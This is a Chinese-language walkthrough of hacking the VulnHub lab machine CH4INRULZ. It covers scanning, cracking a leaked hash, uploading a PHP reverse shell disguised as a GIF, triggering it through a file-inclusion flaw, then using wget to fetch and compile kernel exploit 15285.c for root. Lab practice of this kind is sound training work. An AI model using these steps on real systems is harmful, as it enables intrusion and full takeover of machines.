渗透测试之靶机试炼(六)
靶机简介
靶机地址:
https://download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova.torrent ( Magnet
运行环境:
VirtualBox
攻击测试机环境
kali
win 10
工具简介
nmap
dirb
python
靶机网卡设置
三台虚拟主机在同一局域网即可
作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。首先nmap全网段扫描,找到目标主机ip
命令 nmap 10.211.55.0/24访问80端口
信息收集一波,没有什么发现。**目录。
发现一个http://10.211.55.29/development/ 需要登录但是没有账户密码,继续收集,御剑目录扫描找到主页备份文件
index.html.bak
直接访问下载查看,发现用户名及hash加密的密码使用kali自带工具进行解密
将用户名及hash密码存入hash.txt
执行 john hash.txt账号:frank
密码:frank!!!
登录成功根据提示访问http://10.211.55.29/development/uploader/
有个上传位置,经过测试,只能上传jpg,png及gif等。没成功。
继续收集信息,之前发现的8011端口,目录**一波
dirb http://10.211.55.29:8011/发现一个api目录,查看
发现一个file_api.php的文件,访问
http://10.211.55.29:8011/api/files_api.php根据提示,少参数,我们加上参数
http://10.211.55.29:8011/api/files_api.php?file=提示是错误的输入
我们更改为post方法传输尝试并没有报错,执行成功,怀疑存在LFI漏洞。尝试读取/etc/passwd文件
这里综合利用一下,之前有一个上传不能直接上传木马,这里利用这个文件包含漏洞拿shell
首先我们先上传一个gif文件,内容为反弹shell到本地的1234端口
我们利用kali自带的shell,位置是/usr/share/webshells/php/php-reverse-shell.php
修改其中的反弹shell的地址,然后在文件开头加上GIF89修改文件后缀为gif,然后上传
然后我们来找上传的文件的具体位置,这里就是经过猜测得到目录的
http://10.211.55.29/development/uploader/FRANKuploads/在本机利用nc监视1234端口,利用文件包含漏洞,包含我们的shell,文件的绝对路径为/var/www/
执行成功反弹回shell
提权
获取交互式shell
命令:
python -c ‘import pty; pty.spawn("/bin/bash")’
查看内核版本内核版本为2.6.35,google找一下 好几个提权 最终利用15285.c进行提权,这个kali自带
将其拷贝至当前目录下
利用python开启简单的Web服务利用拿到的shell进行下载,这里需要切换目录,当前目录没有权限,这里选择tmp目录
命令 wget http://10.211.55.8:8888/15285.c(作者这个shell不知为什么会双写)然后对该文件进行编译,添加执行权限
命令 gcc 15285.c -o 15285
chmod 777 15285执行该文件,拿到root权限